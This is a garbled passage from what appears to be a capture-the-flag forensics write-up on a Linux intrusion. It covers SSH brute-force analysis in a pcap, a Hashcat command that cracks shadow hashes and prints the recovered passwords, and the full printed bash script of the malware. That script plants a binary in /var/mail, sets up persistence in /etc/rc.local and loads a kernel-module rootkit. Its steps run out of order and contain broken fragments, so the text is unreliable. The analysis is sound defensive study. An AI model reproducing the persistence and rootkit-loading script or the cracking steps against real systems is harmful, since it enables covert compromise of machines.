This script is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel and can be used to start custom services.ġ1. echo -e "/var/mail/mail &\nsleep 1\npidof mail > /proc/dmesg\nexit 0" > /etc/rc.local If we refer to the contents of the bash script seen earlier, we can note that the echo command is used to add a new command to the “ /etc/rc.local” script. What file has the script modified so the malware will start upon reboot? I can then check the MD5 hash for all three files and get the hash for the main malware file: $ md5sum malware-1 malware-2 malware-3 772b620736b760c1d736b1e6ba2f885b malware-1 2f41df5a12a1f64e47dede21f1c47326 malware-2 dadbb7fe0577d016bb825d3c59dc3715 malware-3ġ0. malware-1) is the main malware file: #!/bin/bash mv 1 /var/mail/mail chmod +x /var/mail/mail echo -e "/var/mail/mail &\nsleep 1\npidof mail > /proc/dmesg\nexit 0" > /etc/rc.local nohup /var/mail/mail > /dev/null 2>&1& mv 2 /lib/modules/`uname -r`/sysmod.ko depmod -a echo "sysmod" > /etc/modules modprobe sysmod sleep 1 pidof mail > /proc/dmesg rm 3 malware-3), I can see that the file named 1 (i.e. Looking at the contents of the third file (i.e. Reviewing each file, I can see that the first first two files are ELF binaries and the third file is a script: $ file malware-1 malware-2 malware-3 malware-1: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header malware-2: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID=21064e0e38e436aa28aecd2612f20205977b3826, with debug_info, not stripped malware-3: Bourne-Again shell script, ASCII text executable I can export all three files and save them to my local machine. I filtered for HTTP traffic as seen below:
#Kali save wireshark pcap download
What is the tool used to download malicious files on the system?īased on our earlier findings, we know that the only other protocol present apart from SSH, is HTTP. What other credentials (username:password) could have been used to gain access also have SUDO privileges? Refer to shadow.log and sudoers.log.ħ.
#Kali save wireshark pcap crack
I used a tool called Hashcat to crack these hashes and I was able to recover two passwords: hashcat64.exe -m 1800 -a 0 hash.txt rockyou.txt -o cracked.txt manager:forgot sean:spectreĦ. What credentials (username:password) were used to gain access? Refer to shadow.log and sudoers.log.Īs part of the challenge, we received a shadow.log and a sudoers.log files. This means that there were 52 failed attempts to establish an SSH session.ĥ. We can see that there is a total of 54 attempts to establish an SSH session, with only two being successful based on the bytes being sent from the server (B) to the client (A).